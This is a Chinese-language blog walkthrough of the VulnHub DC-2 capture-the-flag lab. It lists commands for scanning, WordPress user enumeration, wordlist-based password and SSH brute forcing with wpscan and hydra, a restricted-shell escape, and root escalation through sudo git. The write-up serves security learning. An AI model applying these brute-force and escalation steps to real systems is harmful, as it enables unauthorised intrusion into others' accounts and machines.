综合实战第二章-DC-2


综合实战第二章

DC-2

环境准备

靶场下载:https://www.vulnhub.com/?page=2&q=dc

攻击机:kali 192.168.3.134

靶机:DC-2 192.168.3.163

信息搜集

老规矩,上nmap

nmap -p- -A 192.168.3.163
也可以把结果放文件里
nmap -T4 -A 192.168.3.163 -p 1-65535 -oN dc.txt

image-20220429185031011

可以看到网站的话没办法直接访问到dc-2

需要设置域名

vim /etc/hosts
在里面添加一项
192.168.3.163 dc-2

image-20220429185140583

访问网站

image-20220429190345694

flag1出来了

cms是wordpress

用nikto扫一下网站

nikto -h dc-2

image-20220429190146091

看到有个wp-login.php这个网站,访问看看

image-20220429190449717

现在需要用户名和密码

用wpscan

wpscan --url dc-2 -e u

image-20220429191341887

找到三个用户admin jerry tom

使用cewl搜集可能的密码

cewl dc-2 -w pass.txt

再新建一个user文件

vi user

image-20220429202742924

里面放这玩意

接下来破解wp用户名密码

wpscan --url dc-2 -U user -P pass.txt 

image-20220429203008526

除了admin,剩下两个账号和密码已经出来了

尝试登录

用jerry账号登录,成功登进去,在里面找到一个flag2

image-20220429203152425

我们尝试用ssh登录

破解ssh
hydra -L user -P pass.txt 192.168.3.163 ssh -s 7744

image-20220429204314330

发现tom可以登录ssh

ssh tom@192.168.3.163 -p 7744 

image-20220429204535117

发现cat没法使

提权

echo $PATH

查看一下自己命令行在哪

image-20220429204757986

然后再查看自己能用什么命令

ls usr/bin

image-20220429204833881

可以用vi或者less读取flag3

vi flag3.txt

image-20220429204921847

接下来调用/bin/sh

BASH_CMDS[a]=/bin/sh

按下键盘a就可以调用/bin/sh

结果还是不能用cat,调用/bin/bash

/bin/bash

依然没用

修改环境变量

export PATH=PATH:/bin
export PATH=PATH:/sbin:/bin

再用cat查看flag,成功了

image-20220429205823175

接下来就可以使用su命令了

su jerry
cd ~
ls
cat flag4.txt

image-20220429210015019

接下来要用到git了

git提权

先查看一下权限

sudo -l

image-20220429210136239

发现git有root权限

拿到最终flag

git可以在help命令之后执行别的命令

sudo git -p --help
或者
sudo git help config

image-20220430092003344

进到这种界面说明可以了

使用!加命令就可以了

!ls /root

image-20220430092052439

!cat /root/final-flag.txt

image-20220430092131306

结束,完美!


文章作者: Broken-year
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 Broken-year !
  目录